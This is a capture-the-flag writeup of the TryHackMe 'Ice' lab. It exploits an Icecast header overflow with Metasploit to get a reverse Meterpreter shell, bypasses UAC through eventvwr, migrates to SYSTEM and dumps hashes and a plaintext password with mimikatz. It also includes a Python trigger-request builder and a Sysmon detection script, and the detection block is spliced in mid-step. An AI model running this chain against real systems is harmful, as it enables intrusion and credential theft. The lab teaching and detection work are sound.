【Tryhackme】Ice(bof)

Disclaimer

The host attacked in this article was tested with proper authorization. The tools and methods shown here are for study and exchange only; do not use the tools or the attack approach in this article for any unlawful purpose. I accept no responsibility for any consequences of doing so, nor for any misuse or damage caused.

Service scan
┌──(root㉿kali)-[~/tryhackme/ice]
└─# nmap -sV -Pn 10.10.121.62
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-15 00:43 EST
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 00:44 (0:00:19 remaining)
Nmap scan report for 10.10.121.62
Host is up (0.30s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
5357/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp  open  http               Icecast streaming media server
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
49160/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Many ports are open; the one to look at is 8000, where nmap identifies Icecast. CVE Details lists an "Execute Code / Overflow" entry for Icecast, CVE-2004-1561: Icecast 2.0.1 and earlier keep the pointers to incoming HTTP header lines in a fixed 32-slot array, and a request with enough header lines writes one pointer past the end of it, which an attacker can turn into code execution. nmap did not report an Icecast version, and the Metasploit module below has no check method (Check: No), so on this host the bug can only be confirmed by running the exploit.

Search msf for an exploit module matching this CVE:

msf6 > search CVE-2004-1561

Matching Modules
================

   #  Name                                  Disclosure Date  Rank   Check  Description
   -  ----                                  ---------------  ----   -----  -----------
   0  exploit/windows/http/icecast_header   2004-09-28       great  No     Icecast Header Overwrite

Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header
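Because the module's Check column is "No", there is no built-in way to confirm the bug before firing the exploit. The Python below is an added example (not part of the original writeup and not Metasploit code) that does the two things a tester wants first: read the Icecast version from its HTTP Server header (assumption: Icecast 2.x reports its version there; the nmap run above did not show one, so a missing version must be treated as "unknown", not "safe") and build a request with a chosen number of header lines, the shape the exploit's trigger takes. Only probe() touches the network; everything else runs offline. Do not send the 32-header request to a server you care about: on a vulnerable build it corrupts the stack, and without a crafted payload the result is simply a crashed streaming service.

```python
import re
import socket

# CVE-2004-1561: Icecast 2.0.1 and earlier. Metasploit's module describes the bug as
# "sending 32 HTTP headers will cause a write one past the end of a pointer array";
# 2.0.2 fixed it.
LAST_VULNERABLE = (2, 0, 1)

# Assumption: Icecast 2.x announces itself as "Server: Icecast <version>".
SERVER_RE = re.compile(rb"^Server:[ \t]*Icecast[ \t]+(\d+)\.(\d+)(?:\.(\d+))?", re.I | re.M)


def parse_icecast_version(response: bytes):
    """(major, minor, patch) from an HTTP response, or None when no Icecast
    Server header is present. A missing patch digit counts as 0."""
    m = SERVER_RE.search(response)
    if not m:
        return None
    return tuple(int(g) if g else 0 for g in m.groups())


def is_vulnerable(version) -> bool:
    """True only for a known-affected version; unknown (None) is not 'safe'."""
    return version is not None and version <= LAST_VULNERABLE


def build_request(n_headers: int, host: str = "10.10.121.62") -> bytes:
    """GET / with exactly n_headers header lines after the request line (n >= 1).
    32 is the trigger shape the exploit uses; this builds it for study, it never sends it."""
    lines = [b"GET / HTTP/1.0", b"Host: " + host.encode()]
    for i in range(n_headers - 1):
        lines.append(b"X-Pad-%d: x" % i)
    return b"\r\n".join(lines) + b"\r\n\r\n"


def count_headers(request: bytes) -> int:
    """Number of header lines in a request, excluding the request line."""
    head = request.split(b"\r\n\r\n", 1)[0]
    return len(head.split(b"\r\n")) - 1


def probe(host: str, port: int = 8000, timeout: float = 5.0):
    """Live banner grab (the only function here that touches the network):
    returns (version, vulnerable?) for a running Icecast."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"GET / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        data = b""
        while len(data) < 4096:
            chunk = s.recv(1024)
            if not chunk:
                break
            data += chunk
    version = parse_icecast_version(data)
    return version, is_vulnerable(version)
```

probe("10.10.121.62") is the call to make against the lab host; a result of (None, False) means the banner carried no version and the decision falls back to what the writeup does, running the module.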

Initial shell

Set the options and run the exploit; it lands an initial shell. The session is a 32-bit Meterpreter running as dark-pc\dark, and the shell's working directory is the Icecast2 install folder:

msf6 exploit(windows/http/icecast_header) > set rhosts 10.10.121.62
rhosts => 10.10.121.62
msf6 exploit(windows/http/icecast_header) > set lhost tun0
lhost => tun0
msf6 exploit(windows/http/icecast_header) > run

[*] Started reverse TCP handler on 10.13.21.169:4444
[*] Sending stage (175174 bytes) to 10.10.121.62
[*] Meterpreter session 1 opened (10.13.21.169:4444 -> 10.10.121.62:49302) at 2021-11-15 02:40:26 -0500

meterpreter > shell
Process 356 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>whoami
whoami
dark-pc\dark

Use post/multi/recon/local_exploit_suggester to enumerate the local privilege-escalation modules this host appears vulnerable to:

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.121.62 - Collecting local exploits for x86/windows...
[*] 10.10.121.62 - 37 exploit checks are being tried...
[+] 10.10.121.62 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.121.62 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

We pick exploit/windows/local/bypassuac_eventvwr, set its options, and run it. The module itself confirms why this works: the current user is a member of the local Administrators group, so a UAC bypass (rather than a kernel exploit) is enough to obtain an elevated token:

msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) > options

Module options (exploit/windows/local/bypassuac_eventvwr):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.3.67     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/bypassuac_eventvwr) > run

[*] Started reverse TCP handler on 10.13.21.169:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.10.121.62
[*] Meterpreter session 2 opened (10.13.21.169:4444 -> 10.10.121.62:49336) at 2021-11-15 03:12:02 -0500
[*] Cleaning up registry keys ...

meterpreter > shell
Process 356 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>whoami
whoami
dark-pc\dark

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

Privilege escalation

The account is still dark-pc\dark, but getprivs now shows a much larger privilege set, including SeTakeOwnershipPrivilege and, for the next step, SeDebugPrivilege. The UAC bypass did not change users; it gave the session a high-integrity token for an account that is already in Administrators, and that token is what lets us open and inject into processes owned by SYSTEM.

List all processes on the target with ps:
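The eventvwr bypass works because eventvwr.exe is an auto-elevated Microsoft binary that, when it opens its management console, resolves the mscfile handler through HKCU\Software\Classes before HKCR. The module plants its command there (the "Configuring payload and stager registry keys" step), starts eventvwr.exe, and deletes the value afterwards ("Cleaning up registry keys"). That leaves two artifacts a defender can look for: a write to that per-user key, and an elevated eventvwr.exe spawning something other than mmc.exe. The Python below is an added detection example, not part of the original writeup or of Metasploit; it runs over constructed Sysmon-style events (Event ID 13 registry SetValue and Event ID 1 process create) whose field names mirror Sysmon's and whose values are made up for the example.

```python
import re

# Constructed Sysmon-style events (made up for this example; field names follow
# Sysmon's Event ID 13 "Registry value set" and Event ID 1 "Process Create").
SAMPLE_EVENTS = [
    {"EventID": 13, "EventType": "SetValue",
     "Image": "C:\\Windows\\SysWOW64\\cmd.exe",
     "TargetObject": "HKU\\S-1-5-21-1000-2000-3000-1001_Classes\\mscfile\\shell\\open\\command\\(Default)",
     "Details": "C:\\Windows\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe -nop -w hidden -c ..."},
    {"EventID": 1, "Image": "C:\\Windows\\SysWOW64\\eventvwr.exe",
     "ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe", "IntegrityLevel": "High"},
    {"EventID": 1, "Image": "C:\\Windows\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\SysWOW64\\eventvwr.exe", "IntegrityLevel": "High"},
    # Benign: a real Event Viewer launch opens its MMC snap-in.
    {"EventID": 1, "Image": "C:\\Windows\\System32\\mmc.exe",
     "ParentImage": "C:\\Windows\\System32\\eventvwr.exe", "IntegrityLevel": "High"},
    # Benign: an ordinary per-user autorun value, not under mscfile.
    {"EventID": 13, "EventType": "SetValue",
     "Image": "C:\\Windows\\explorer.exe",
     "TargetObject": "HKU\\S-1-5-21-1000-2000-3000-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "Details": "C:\\Users\\Dark\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"},
]

# HKCU\Software\Classes appears in Sysmon under the user's hive, either as
# HKU\<SID>\Software\Classes\... or as the separate HKU\<SID>_Classes\... hive.
MSCFILE_HIJACK = re.compile(
    r"^HKU\\[^\\]+(?:\\Software\\Classes|_Classes)\\mscfile\\shell\\open\\command(?:\\|$)",
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def hijacked_mscfile_handlers(events):
    """Registry writes that plant a per-user mscfile open handler (the bypass's setup step)."""
    return [e for e in events
            if e.get("EventID") == 13 and e.get("EventType") == "SetValue"
            and MSCFILE_HIJACK.match(e.get("TargetObject", ""))]


def suspicious_eventvwr_children(events):
    """Processes spawned by eventvwr.exe other than its legitimate child mmc.exe."""
    return [e for e in events
            if e.get("EventID") == 1
            and _basename(e.get("ParentImage", "")) == "eventvwr.exe"
            and _basename(e.get("Image", "")) != "mmc.exe"]


def correlate(events):
    """Single verdict for one host: both artifacts together point at the eventvwr bypass."""
    hijacks = hijacked_mscfile_handlers(events)
    children = suspicious_eventvwr_children(events)
    return {"hijacks": hijacks, "children": children,
            "verdict": "eventvwr-uac-bypass" if hijacks and children else "none"}
```

Either artifact alone is worth a look, but the registry write is the stronger one: the value is deleted ten seconds later, so an agent that forwards Sysmon events in near real time sees it, while a periodic registry scan will not.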
meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 500   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 544   536   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 588   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 592   536   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 604   584   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 652   584   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 692   592   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 700   592   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 708   592   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 816   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 884   692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 932   692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1056  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1136  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1224  816   slui.exe              x64   1        Dark-PC\Dark                  C:\Windows\System32\slui.exe
 1264  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1328  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1408  692   taskhost.exe          x64   1        Dark-PC\Dark                  C:\Windows\System32\taskhost.exe
 1516  692   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1528  500   dwm.exe               x64   1        Dark-PC\Dark                  C:\Windows\System32\dwm.exe
 1548  1508  explorer.exe          x64   1        Dark-PC\Dark                  C:\Windows\explorer.exe
 1712  692   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
 1720  692   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 1752  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1804  816   WmiPrvSE.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 1892  692   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 2108  2300  cmd.exe               x86   1        Dark-PC\Dark                  C:\Windows\SysWOW64\cmd.exe
 2124  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 2284  604   conhost.exe           x64   1        Dark-PC\Dark                  C:\Windows\System32\conhost.exe
 2300  1548  Icecast2.exe          x86   1        Dark-PC\Dark                  C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
 2352  692   vds.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 2460  692   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 2528  692   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 2536  2092  powershell.exe        x86   1        Dark-PC\Dark                  C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
 2916  604   conhost.exe           x64   1        Dark-PC\Dark                  C:\Windows\System32\conhost.exe

Note this process:

 1264  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe

spoolsv.exe runs as NT AUTHORITY\SYSTEM and is a 64-bit process. Our session currently lives in PID 2536, the 32-bit powershell.exe, so migrating into spoolsv.exe does two things at once: the session inherits the SYSTEM token, and it becomes a 64-bit Meterpreter, which matters for reading credentials out of the 64-bit LSASS in the next step. migrate -N picks the target by executable name:

meterpreter > migrate -N spoolsv.exe
[*] Migrating from 2536 to 1264...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Harvesting other users' credentials

Use load kiwi to load the Mimikatz extension and collect the credentials cached on the system. The banner reports x64, matching the process we migrated into:

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

Success.

Run help to list the kiwi commands the extension provides:

Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_livessp          Retrieve Live SSP creds
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

Use creds_all to dump every credential LSASS is holding:

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
Dark      Dark-PC  e52cac67419a9a22ecb08369099ed302  7c4fe5eada682714a036e39378362bab  0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
DARK-PC$  WORKGROUP  (null)
Dark      Dark-PC    Password01!

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
Dark      Dark-PC  Password01!

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
Dark      Dark-PC    Password01!
dark-pc$  WORKGROUP  (null)

So Dark's logon password is Password01!. The plaintext is recoverable because Windows 7 still caches WDigest and TsPkg credentials in LSASS by default; the msv block carries the same credential as LM, NTLM and SHA1 hashes, and the NTLM value alone is enough for pass-the-hash on a system where no plaintext is cached (Windows 8.1 and later, or a Windows 7 host with KB2871997 installed and UseLogonCredential set to 0).
